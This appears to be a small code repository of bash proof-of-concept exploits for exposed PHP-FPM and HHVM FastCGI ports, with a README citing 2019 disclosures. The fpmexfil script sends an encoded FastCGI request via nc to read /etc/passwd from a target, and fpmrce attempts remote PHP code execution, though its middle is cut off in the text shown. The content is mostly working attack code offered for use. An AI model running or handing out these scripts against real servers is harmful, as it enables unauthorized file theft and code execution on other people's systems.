├── LICENSE ├── README.md ├── fpmexfil └── fpmrce /LICENSE: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # fpmvuln 2 | bash poc scripts to exploit open fpm ports 3 | 4 | fpmexfil 5 | -------- 6 | 7 | Will try to exfiltrate /etc/passwd from target host. Works with many hosts using 8 | HHVM exposed on a public interface 9 | 10 | fpmrce 11 | ------ 12 | 13 | Will try to execute PHP code on remote host. Works with most PHP installations exposing fpm 14 | on the public port. 15 | 16 | background 17 | ---------- 18 | 19 | * https://www.openwall.com/lists/oss-security/2019/07/09/2 20 | * https://www.golem.de/news/fpm-sicherheitsluecke-daten-exfiltrieren-mit-facebooks-hhvm-1907-142418.html 21 | * https://hhvm.com/blog/2019/06/10/hhvm-4.9.0.html 22 | * https://www.openwall.com/lists/oss-security/2019/07/27/1 23 | 24 | misc 25 | ---- 26 | 27 | There were previous, similar exploits for these issues: 28 | 29 | * https://github.com/wofeiwo/webcgi-exploits/blob/master/php/Fastcgi/fcgi_exp.go 30 | * https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75 31 | -------------------------------------------------------------------------------- /fpmexfil: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # script will try to exfiltrate /etc/passwd from target host 4 | 5 | payload="AQEAAQAIAAAAAQAAAAAAAAEEAAEARwEACwtTQ1JJUFRfTkFNRS9ldGMvcGFzc3dkDwtTQ1JJUFRfRklMRU5BTUUvZXRjL3Bhc3N3ZA4DUkVRVUVTVF9NRVRIT0RHRVQAAQQAAQAAAAABBQABAAAAAA==" 6 | 7 | echo "Trying to exfiltrate /etc/passwd from $1" 8 | 9 | ret="$(echo $payload | base64 -d | nc $1 9000)" 10 | 11 | echo "$ret" |grep -qi "content-type" 12 | [ $? -eq 0 ] && echo "Got response, looks like open FPM port" 13 | 14 | echo "$ret" ] | grep -q "root:" 15 | [ $? -eq 0 ] && echo "Response looks like passwd file, seems we can exfiltrate" 16 | 17 | echo 18 | echo "Response:" 19 | echo "$ret" 20 | -------------------------------------------------------------------------------- /fpmrce: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # script will try to execute PHP code on target host 4 | 5 | PAYLOAD=" $OUTPUT 17 | 18 | grep -q 5253 $OUTPUT 19 | [ $? -eq 0 ] && echo "+++ RCE success with $FN on $HOST, output in $OUTPUT" 20 | done 21 | --------------------------------------------------------------------------------